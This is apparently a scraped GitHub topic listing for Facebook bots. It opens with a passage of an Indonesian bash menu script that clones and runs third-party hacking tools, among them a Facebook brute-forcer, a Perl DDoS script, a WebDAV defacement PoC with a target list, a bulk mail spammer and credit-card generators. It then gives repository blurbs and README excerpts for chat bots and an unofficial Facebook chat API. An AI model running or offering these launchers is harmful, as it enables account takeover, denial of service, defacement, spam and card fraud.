"[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/CREATE-BOT-SSH cd CREATE-BOT-SSH python2 ssh.py fi if [ $kaex = 14 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/ghoul cd ghoul python3 ghoul.py fi if [ $kaex = 15 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/SQLI-Vuln-Checker cd SQLI-Vuln-Checker python3 sqli.py fi if [ $kaex = 16 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/Wp-Scan cd Wp-Scan python2 auto.py fi if [ $kaex = 17 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/NAS cd NAS python3 sabyan.chan fi if [ $kaex = 18 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/Mp4-Convert cd Mp4-Convert python2 tube.py fi if [ $kaex = 19 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/Exploit-Lokomedia cd Exploit-Lokomedia python2 Loko.py fi if [ $kaex = 20 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/DDoS-With-Perl cd DDoS-With-Perl perl dos.pl fi if [ $kaex = 21 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/Apkpure-Downloader cd Apkpure-Downloader pip2 install -r requirements.txt python2 apk.py fi if [ $kaex = 22 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/GitHub-Info cd GitHub-Info python3 github.py -h fi if [ $kaex = 23 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/PROXY-CHECKER cd PROXY-CHECKER python3 proxy.py fi if [ $kaex = 24 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/PenKEX cd PenKEX python2 PenKex.py fi if [ $kaex = 25 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/Ysub-Checker cd Ysub-Checker php ysub.php fi if [ $kaex = 26 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/Text-To-Hex cd Text-To-Hex python2 hextex.py fi if [ $kaex = 27 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/Webdav-Apk mv -f Webdav-Apk /sdcard cd /sdcard/Webdav-Apk echo $cy"APLIKASI WEBDAV NYA ADA DI DIRECTORY SDCARD/INTERNAL KALIAN" sleep 9 ls fi if [ $kaex = 28 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/Pentester cd Pentester python2 pentest.py fi if [ $kaex = 29 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/ASWPLOIT cd ASWPLOIT sh install.sh fi if [ $kaex = 30 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/InFoGa cd InFoGa python infoga.py fi if [ $kaex = 31 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/ParrotSec cd ParrotSec bash parrot.sh fi if [ $kaex = 32 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/grabgithub cd grabgithub bash github.sh fi if [ $kaex = 33 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/subfinder cd subfinder bash subdocheck.sh fi if [ $kaex = 34 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/rolispam cd rolispam bash rolispam.sh fi if [ $kaex = 35 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/mail-filter cd mail-filter bash filter.sh fi if [ $kaex = 36 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/adminscan cd adminscan bash admin.sh fi if [ $kaex = 37 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/Ipinfo cd Ipinfo bash ipinfo.sh fi if [ $kaex = 38 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/cardgen cd cardgen bash cc.sh fi if [ $kaex = 39 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/cardvalidator cd cardvalidator bash card.sh fi if [ $kaex = 40 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/bloggrab cd bloggrab bash bloggrab.sh fi if [ $kaex = 41 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/igstalker cd igstalker bash igstalker.sh fi if [ $kaex = 42 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/gpstrack cd gpstrack bash gpstrack.sh fi if [ $kaex = 43 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/urldecode cd urldecode bash urldecode.sh fi if [ $kaex = 44 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/checker cd checker bash yahoo.sh fi if [ $kaex = 45 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/fbbot cd fbbot bash bot.sh fi if [ $kaex = 46 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/ytsubs cd ytsubs bash ytsubs.sh fi if [ $kaex = 47 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/TOOLSINSTALLERv1 cd TOOLSINSTALLERv1 sh Tuanb4dut.sh fi if [ $kaex = 48 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/TOOLSINSTALLERv2 cd TOOLSINSTALLERv2 sh Tuanb4dut.sh fi if [ $kaex = 49 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/TOOLSINSTALLERv3 cd TOOLSINSTALLERv3 sh TUANB4DUT.sh fi if [ $kaex = 50 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/TOOLSINSTALLERv4 cd TOOLSINSTALLERv4 chmod +x TUANB4DUT..sh ./TUANB4DUT..sh fi if [ $kaex = 51 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/DIR cd DIR sh dir.sh fi if [ $kaex = 52 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/REVERSEIP sh REVERSEIP.sh fi if [ $kaex = 53 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/TRACKIP cd TRACKIP sh TRACKIP.sh fi if [ $kaex = 54 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/DNSLOOKUP cd DNSLOOKUP sh DNSLOOKUP.sh fi if [ $kaex = 55 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/WHOIS cd WHOIS sh WHOIS.sh fi if [ $kaex = 56 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/REVERSEDNS cd REVERSEDNS sh REVERSEDNS.sh fi if [ $kaex = 57 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/WEBDAV cd WEBDAV echo $or"LIVE TARGET DEFACE POC WEBDAV" cat WebLiveTarget.txt sleep 7 sh webdav.sh fi if [ $kaex = 58 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/DIRHUNT cd DIRHUNT sh DIRHUNT.sh fi if [ $kaex = 59 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/SUBDO cd SUBDO sh subdo.sh fi if [ $kaex = 60 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/HTTPHEADERS cd HTTPHEADERS sh httpheaders.sh fi if [ $kaex = 61 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/YOUTUBE cd YOUTUBE sh install.sh chmod +x YOUTUBE.sh ./YOUTUBE.sh fi if [ $kaex = 62 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/ADLOG cd ADLOG python2 adlog.py fi if [ $kaex = 63 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/JADWALSHOLAT cd JADWALSHOLAT sh jadwal.sh fi if [ $kaex = 64 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/TOOLKIT cd TOOLKIT sh TUANB4DUT.sh fi if [ $kaex = 65 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/BASH-ENCRYPT cd BASH-ENCRYPT sh setup.sh sh encrypt.sh fi if [ $kaex = 66 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/ENCRYPT-PYTHON cd ENCRYPT-PYTHON python2 compile.py fi if [ $kaex = 67 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/FACEBOOK-BRUTEFORCE cd FACEBOOK-BRUTEFORCE python2 bruteforce.py fi if [ $kaex = 68 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/VULNSCANNING cd VULNSCANNING python2 testvuln.py fi if [ $kaex = 69 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/SHORTNERLINKS cd SHORTNERLINKS sh URL.sh fi if [ $kaex = 70 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/PERKIRAAN-CUACA cd PERKIRAAN-CUACA sh CUACA.sh fi if [ $kaex = 71 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/ARITMATIKA cd ARITMATIKA sh aritmatika.sh fi if [ $kaex = 72 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/blackcodercrush/shortlink cd shortlink python2 shortlink.py fi if [ $kaex = 73 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/blackcodercrush/404Github cd 404Github python2 404Github.py fi if [ $kaex = 74 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/blackcodercrush/X-Caping cd X-Caping python2 Scaping.py fi if [ $kaex = 75 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/blackcodercrush/ScriptCreator cd ScriptCreator python2 Screator.py fi if [ $kaex = 76 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/blackcodercrush/LinkChatGen cd LinkChatGen sh chat.wa fi if [ $kaex = 77 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/blackcodercrush/BulkMailSpam cd BulkMailSpam python2 BulkMailSpam.py exit fi if [ $kaex = 78 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/blackcodercrush/BinCon cd BinCon pythob2 bin.con exit fi if [ $kaex = 79 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/blackcodercrush/DfvAscii cd DfvAscii sh dfv.ascii fi if [ $kaex = 80 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/blackcodercrush/DfvXploit cd DfvXploit pip install -r modul.txt python dfv.xploit fi if [ $kaex = 81 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/black-ware/Dorking cd Dorking sh Dork.sh fi if [ $kaex = 82 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/black-ware/scanning cd scanning sh vuln-scanner.sh fi if [ $kaex = 83 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/black-ware/Reverse-Ip cd Reverse-Ip python2 github.py fi if [ $kaex = 84 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/black-ware/CBT-Vuln_scanner cd CBT-Vuln_scanner python2 cbt-scanner.py fi if [ $kaex = 99 ] then clear pkg update && pkg upgrade pkg install git pkg install python2 && pkg install python pip2 install lolcat pip2 install requests pip2 install mechanize pip2 install dirhunt pip2 install youtube-dl pkg install curl pkg install php pip2 install termcolor pip2 install bs4 pip2 install beautifulsoup pip2 install colorama pkg install perl pkg install ruby pip install requests pkg install figlet fi if [ $kaex = 00 ] then clear echo $pu"───────────────────────────────────────────" echo $or"CEO" $ku"AND" $bi"FOUNDER" $ij"Kalsel" $pu"[" $pr"E" $pu"]" $cy"Xploit" echo $pu"───────────────────────────────────────────" echo $ij"CEO & FOUNDER" $or"Kalsel" $bi"[" $ij"E" $bi"]" $or"Xploit" echo $cy"NAME : ARDHO AINULLAH" echo $or"CODENAME : MUH4K3M0S" echo $pu"SCHOOL : DARUSSALLAM" echo $ku"REGION : KALIMANTAN SELATAN" echo $pu"───────────────────────────────────────────" echo $ij"LEADER" $or"kalsel" $bi"[" $ij"E" $bi"]" $or"Xploit" echo $or"NAME : MUHAMMAD RAFLI" echo $ij"CODENAME : IY×RafCode" echo $cy"SCHOOL : NURUL HIDAYAH" echo $ku"REGION : KALIMANTAN SELATAN" echo $pu"───────────────────────────────────────────" echo $ij"CO-LEADER" $or"kalsel" $bi"[" $ij"E" $bi"]" $or"Xploit" echo $ku"NAME : M.WIDHI SATRIO" echo $ij"CODENAME : WIDHISEC" echo $pu"SCHOOL : ----" echo $cy"REGION : KALIMANTAN BARAT" echo $pu"───────────────────────────────────────────" echo $ij"ADMIN" $or"kalsel" $bi"[" $ij"E" $bi"]" $or"Xploit" echo $pr"NAME : --------" echo $or"CODENAME : MR_MSDV" echo $pu"SCHOOL : -------" echo $ku"REGION : KALIMANTAN SELATAN" echo $pu"───────────────────────────────────────────"

    From user mrastra96

  • neil1023 / chappi

    facebook-github-bot, Played around with Botkit (https://github.com/howdyai/botkit) to create our own implementation of the Facebook messenger bot.

    From user neil1023

  • oladimejiadesina-123 / follower

    facebook-github-bot, Twitter, instagram, facebook bot. Follow unfollow like unlike. - GitHub - mobouhlel/follower: Twitter, instagram, facebook bot. Follow unfollow like unlike.

    From user oladimejiadesina-123

  • petrus1980 / ayaka-v2

    facebook-github-bot, <div align="center"> <img src="https://i.ytimg.com/vi/nkhVzxXnuSQ/maxresdefault.jpg" alt="HisokaBot" width="500" /> # _**HisokaBot**_ > HisokaBot is a multipurpose WhatsApp bot using wa-automate-nodejs library! > Script Copy From [BocchiBot](https://github.com/SlavyanDesu/BocchiBot) > > # Requirements * [Node.js](https://nodejs.org/en/) * [Git](https://git-scm.com/downloads) * [FFmpeg](https://www.gyan.dev/ffmpeg/builds/) * [libwebp](https://developers.google.com/speed/webp/download) * Any text editor # Installation ## 📝 Cloning this repo ```cmd > git clone https://github.com/dxxoo/HisokaBOT-Whatsapp-Bot.git > cd HisokaBOT-Whatsapp-Bot ``` ## ✍️ Editing the file Edit the required value in `config.json`. ```json { "ownerBot": "[email protected]", "prefix": "$", "uaOverride": "WhatsApp/2.2037.6 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36", "itech": "api-key", "nao": "api-key", "vhtear": "api-key", "melodic": "administrator", "tobz": "BotWeA" } ``` `ownerBot`: your WhatsApp number. `prefix`: bot's prefix. `uaOverride`: your user agent. `itech`: I-Tech API key. You can get it [here](https://api.i-tech.id) by creating an account. After that, set your server/host static IP in [here](https://api.i-tech.id/settings/profile). `nao`: SauceNAO API key. You can get it [here](https://saucenao.com/user.php) by creating an account. `vhtear`: VHTear API key. You can get it [here](https://api.vhtear.com/) by purchasing his API key. `melodic`: MelodicXT API key. You can use `administrator` key. `tobz`: Tobz API key. You can use `BotWeA` key. ## 🗣️ Changing language If you want to change the language to English, replace all `ind` function to `eng`. Example: ```js ind.wrongFormat() ``` To: ```js eng.wrongFormat() ``` ## 🛠️ Installing the FFmpeg * Download one of the available versions of FFmpeg by clicking [this link](https://www.gyan.dev/ffmpeg/builds/). * Extract the file to `C:\` path. * Rename the extracted folder to `ffmpeg`. * Run Command Prompt as Administrator. * Run this command: ```cmd > setx /m PATH "C:\ffmpeg\bin;%PATH%" ``` It will give us a callback like `SUCCESS: specified value was saved`. * Now that you've FFmpeg installed, verify that it's working by running this command to see version number: ```cmd > ffmpeg -version ``` ## 📷 Installing the libwebp The installation is same as you install FFmpeg but whatever. I will make it clear. * Download the file according to the OS you are using by clicking [this link](https://developers.google.com/speed/webp/download). * Extract the file to `C:\` path. * Rename the extracted file to `libwebp`. * Run Command Prompt as Administrator. * Run this command: ```cmd > setx /m PATH "C:\libwebp\bin;%PATH%" ``` It will give us a callback like `SUCCESS: specified value was saved`. * Now that you've libwebp installed, verify that it's installed by running this command to see version number: ```cmd > webpmux -version ``` ## 🔍 Installing the dependencies ```cmd > npm install ``` ## 🆗 Running the bot Regular node: ```cmd > npm start ``` PM2: ```cmd > pm2 start index.js > pm2 monit ``` PM2 with cron job (restart after 5 hours): ```cmd > pm2 start index.js --cron "* */5 * * *" > pm2 monit ``` After that scan the QR code using your WhatsApp in your phone! # Features If you want to unlock premium commands, please buy me a coffee at least 1 on Ko-fi platform. | Leveling | Availability | | :--------------: | :------------: | | Leveling | ✔️ | | Set level color | Soon | | Set bar color | Soon | | Sticker Maker | Availability | | :-------------------: | :----------: | | Send/reply image | ✔️ | | Send/reply GIF | ✔️ | | Send/reply MP4 | ✔️ | | Text to sticker | ✔️ | | Text to sticker GIF | ✔️ | | Sticker to image | ✔️ | | Sticker WM | ✔️ | | Take sticker | ✔️ | | Downloader | Availability | | :-----------------: | :----------: | | Facebook video | ✔️ | | YouTube audio/video | ✔️ | | Joox musics | ✔️ | | TikTok video | ✔️ | | TikTok profile pic | ✔️ | | Twitter video/image | ✔️ | | Instagram post | ✔️ | | Instagram story | ✔️ | | LK21 | ✔️ | | TikTok no WM | ✔️ | | Misc | Availability | | :------------------: | :----------: | | Say | ✔️ | | Search lyrics | ✔️ | | Shortlink maker | ✔️ | | Wikipedia (EN) | ✔️ | | Wikipedia (ID) | ✔️ | | KBBI scarper | ✔️ | | Stalk IG account | ✔️ | | GSMArena scraper | ✔️ | | Search food receipts | ✔️ | | YouTube search | ✔️ | | Text to speech | ✔️ | | AFK | ✔️ | | Distance calculator | ✔️ | | Sticker search | ✔️ | | Calculator | ✔️ | | Al-Qur'an surah | ✔️ | | List surah | ✔️ | | Random contact | ✔️ | | YouTube play | ✔️ | | Whois | ✔️ | | SMS gateway | ✔️ | | Al-Qur'an tafseer | ✔️ | | Al-Kitab search | ✔️ | | LK21 scraper | ✔️ | | Reminder | ✔️ | | Image uploader | ✔️ | | Sholat schedule | ✔️ | | Latest Line stickers | ✔️ | | Check postage | ✔️ | | Sending email | ✔️ | | Random quotes | ✔️ | | Genshin chara info | ✔️ | | Fun | Availability | | :-------------------: | :----------: | | Weton jodoh | ✔️ | | Horoscope | ✔️ | | Harta tahta maker | ✔️ | | Writing text maker | ✔️ | | Glitch text maker | ✔️ | | SimSimi chatbot | ✔️ | | Blackpink logo maker | ✔️ | | Pornhub logo maker | ✔️ | | Galaxy text maker | ✔️ | | Truth or dare | ✔️ | | Asupan TikTok | ✔️ | | PH comment maker | ✔️ | | Triggered maker | ✔️ | | Kiss image maker | ✔️ | | 3D text maker | ✔️ | | Freefire logo maker | ✔️ | | Freefire banner maker | ✔️ | | Sliding text maker | ✔️ | | Hero ML maker | ✔️ | | Fire text maker | ✔️ | | Couple balloon maker | ✔️ | | Wasted maker | ✔️ | | Cakl Lontong quiz | ✔️ | | Hilih-ify text | ✔️ | | Tebak gambar quiz | ✔️ | | Random doge stickers | ✔️ | | Dice | ✔️ | | Weeb Zone | Availability | | :-------------------: | :----------: | | Random neko girl | ✔️ | | Random wallpaper | ✔️ | | Random kemonomimi | ✔️ | | Kusonime scraper | ✔️ | | Komiku scraper | ✔️ | | Anime tracer | ✔️ | | Source finder | ✔️ | | Random waifu pics | ✔️ | | Anitoki latest update | ✔️ | | Random anime stickers | ✔️ | | Neonime latest update | ✔️ | | Anoboy on-going list | ✔️ | | Bot | Availability | | :--------------: | :----------: | | Server usage | ✔️ | | Blocked list | ✔️ | | Ping | ✔️ | | Delete messages | ✔️ | | Bug report | ✔️ | | Join group | ✔️ | | Check serials | ✔️ | | Owner | Availability | | :----------------: | :----------: | | Broadcasting | ✔️ | | Clear all messages | ✔️ | | Leave all groups | ✔️ | | Get snapshot | ✔️ | | Ban | ✔️ | | Eval | ✔️ | | Shutdown | ✔️ | | Add premium user | ✔️ | | Set bot's info | ✔️ | | Mute bot | ✔️ | | Moderation | Availability | | :--------------: | :----------: | | Add | ✔️ | | Kick | ✔️ | | Promote | ✔️ | | Demote | ✔️ | | Leave bot | ✔️ | | Everyone | ✔️ | | Toogle NSFW | ✔️ | | Set group icon | ✔️ | | Anti-group link | ✔️ | | Toogle welcome | ✔️ | | Auto-sticker | ✔️ | | Mute group | ✔️ | | Anti-NSFW link | ✔️ | | Anti-porn | Premium | | NSFW | Availability | | :----------------: | :----------: | | Lewds | ✔️ | | nHentai lookup | ✔️ | | Fetish | ✔️ | | Latest Nekopoi | ✔️ | | Pornhub downloader | ✔️ | | Waifu 18+ | ✔️ | | Yuri | ✔️ | | Femdom | ✔️ | | Lewd avatars | ✔️ | | nHentai search | ✔️ | | nHentai downloader | Premium | | Multi-lewds | Premium | | Multi-fetish | Premium | # Thanks to * [`open-wa/wa-automate-nodejs`](https://github.com/open-wa/wa-automate-nodejs) * [`YogaSakti/imageToSticker`](https://github.com/YogaSakti/imageToSticker) * [`SlavyanDesu`](https://github.com/SlavyanDesu)

    From user petrus1980

  • prometheus-ai / fb-messenger-clj

    facebook-github-bot, A Clojure Library for the Facebook Messenger Bot API. Wiki: https://github.com/prometheus-ai/fb-messenger-clj/wiki

    From organization prometheus-ai

  • r00t-debug / weather_bot

    facebook-github-bot, First messenger bot to use dialogflow as a NLP and OWM api to check weather report, mostly copied from this repository: https://github.com/codecraf8/facebook-messenger-bot-python-flask

    From user r00t-debug

  • sheilap17 / bot

    facebook-github-bot, Prueba de bot facebook con github y zenbot

    From user sheilap17

  • tinkprocodes / fca-unofficial

    facebook-github-bot, This repo is a fork from main repo and will usually have new features bundled faster than main repo (and maybe bundle some bugs, too). # Unofficial Facebook Chat API <img alt="version" src="https://img.shields.io/github/package-json/v/ProCoderMew/fca-unofficial?label=github&style=flat-square"> Facebook now has an official API for chat bots [here](https://developers.facebook.com/docs/messenger-platform). This API is the only way to automate chat functionalities on a user account. We do this by emulating the browser. This means doing the exact same GET/POST requests and tricking Facebook into thinking we're accessing the website normally. Because we're doing it this way, this API won't work with an auth token but requires the credentials of a Facebook account. _Disclaimer_: We are not responsible if your account gets banned for spammy activities such as sending lots of messages to people you don't know, sending messages very quickly, sending spammy looking URLs, logging in and out very quickly... Be responsible Facebook citizens. See [below](#projects-using-this-api) for projects using this API. ## Install If you just want to use fca-unofficial, you should use this command: ```bash npm install procodermew/fca-unofficial ``` It will download `fca-unofficial` from NPM repositories ## Testing your bots If you want to test your bots without creating another account on Facebook, you can use [Facebook Whitehat Accounts](https://www.facebook.com/whitehat/accounts/). ## Example Usage ```javascript const login = require("fca-unofficial"); // Create simple echo bot login({email: "FB_EMAIL", password: "FB_PASSWORD"}, (err, api) => { if(err) return console.error(err); api.listen((err, message) => { api.sendMessage(message.body, message.threadID); }); }); ``` Result: <img width="517" alt="screen shot 2016-11-04 at 14 36 00" src="https://cloud.githubusercontent.com/assets/4534692/20023545/f8c24130-a29d-11e6-9ef7-47568bdbc1f2.png"> ## Documentation You can see it [here](DOCS.md). ## Main Functionality ### Sending a message #### api.sendMessage(message, threadID[, callback][, messageID]) Various types of message can be sent: * *Regular:* set field `body` to the desired message as a string. * *Sticker:* set a field `sticker` to the desired sticker ID. * *File or image:* Set field `attachment` to a readable stream or an array of readable streams. * *URL:* set a field `url` to the desired URL. * *Emoji:* set field `emoji` to the desired emoji as a string and set field `emojiSize` with size of the emoji (`small`, `medium`, `large`) Note that a message can only be a regular message (which can be empty) and optionally one of the following: a sticker, an attachment or a url. __Tip__: to find your own ID, you can look inside the cookies. The `userID` is under the name `c_user`. __Example (Basic Message)__ ```js const login = require("fca-unofficial"); login({email: "FB_EMAIL", password: "FB_PASSWORD"}, (err, api) => { if(err) return console.error(err); var yourID = "000000000000000"; var msg = "Hey!"; api.sendMessage(msg, yourID); }); ``` __Example (File upload)__ ```js const login = require("fca-unofficial"); login({email: "FB_EMAIL", password: "FB_PASSWORD"}, (err, api) => { if(err) return console.error(err); // Note this example uploads an image called image.jpg var yourID = "000000000000000"; var msg = { body: "Hey!", attachment: fs.createReadStream(__dirname + '/image.jpg') } api.sendMessage(msg, yourID); }); ``` ------------------------------------ ### Saving session. To avoid logging in every time you should save AppState (cookies etc.) to a file, then you can use it without having password in your scripts. __Example__ ```js const fs = require("fs"); const login = require("fca-unofficial"); var credentials = {email: "FB_EMAIL", password: "FB_PASSWORD"}; login(credentials, (err, api) => { if(err) return console.error(err); fs.writeFileSync('appstate.json', JSON.stringify(api.getAppState())); }); ``` Alternative: Use [c3c-fbstate](https://github.com/c3cbot/c3c-fbstate) to get fbstate.json (appstate.json) ------------------------------------ ### Listening to a chat #### api.listen(callback) Listen watches for messages sent in a chat. By default this won't receive events (joining/leaving a chat, title change etc…) but it can be activated with `api.setOptions({listenEvents: true})`. This will by default ignore messages sent by the current account, you can enable listening to your own messages with `api.setOptions({selfListen: true})`. __Example__ ```js const fs = require("fs"); const login = require("fca-unofficial"); // Simple echo bot. It will repeat everything that you say. // Will stop when you say '/stop' login({appState: JSON.parse(fs.readFileSync('appstate.json', 'utf8'))}, (err, api) => { if(err) return console.error(err); api.setOptions({listenEvents: true}); var stopListening = api.listenMqtt((err, event) => { if(err) return console.error(err); api.markAsRead(event.threadID, (err) => { if(err) console.error(err); }); switch(event.type) { case "message": if(event.body === '/stop') { api.sendMessage("Goodbye…", event.threadID); return stopListening(); } api.sendMessage("TEST BOT: " + event.body, event.threadID); break; case "event": console.log(event); break; } }); }); ``` ## FAQS 1. How do I run tests? > For tests, create a `test-config.json` file that resembles `example-config.json` and put it in the `test` directory. From the root >directory, run `npm test`. 2. Why doesn't `sendMessage` always work when I'm logged in as a page? > Pages can't start conversations with users directly; this is to prevent pages from spamming users. 3. What do I do when `login` doesn't work? > First check that you can login to Facebook using the website. If login approvals are enabled, you might be logging in incorrectly. For how to handle login approvals, read our docs on [`login`](DOCS.md#login). 4. How can I avoid logging in every time? Can I log into a previous session? > We support caching everything relevant for you to bypass login. `api.getAppState()` returns an object that you can save and pass into login as `{appState: mySavedAppState}` instead of the credentials object. If this fails, your session has expired. 5. Do you support sending messages as a page? > Yes, set the pageID option on login (this doesn't work if you set it using api.setOptions, it affects the login process). > ```js > login(credentials, {pageID: "000000000000000"}, (err, api) => { … } > ``` 6. I'm getting some crazy weird syntax error like `SyntaxError: Unexpected token [`!!! > Please try to update your version of node.js before submitting an issue of this nature. We like to use new language features. 7. I don't want all of these logging messages! > You can use `api.setOptions` to silence the logging. You get the `api` object from `login` (see example above). Do > ```js > api.setOptions({ > logLevel: "silent" > }); > ``` <a name="projects-using-this-api"></a> ## Projects using this API: - [c3c](https://github.com/lequanglam/c3c) - A bot that can be customizable using plugins. Support Facebook & Discord. - [Miraiv2](https://github.com/miraiPr0ject/miraiv2) - A simple Facebook Messenger Bot made by CatalizCS and SpermLord. ## Projects using this API (original repository, facebook-chat-api): - [Messer](https://github.com/mjkaufer/Messer) - Command-line messaging for Facebook Messenger - [messen](https://github.com/tomquirk/messen) - Rapidly build Facebook Messenger apps in Node.js - [Concierge](https://github.com/concierge/Concierge) - Concierge is a highly modular, easily extensible general purpose chat bot with a built in package manager - [Marc Zuckerbot](https://github.com/bsansouci/marc-zuckerbot) - Facebook chat bot - [Marc 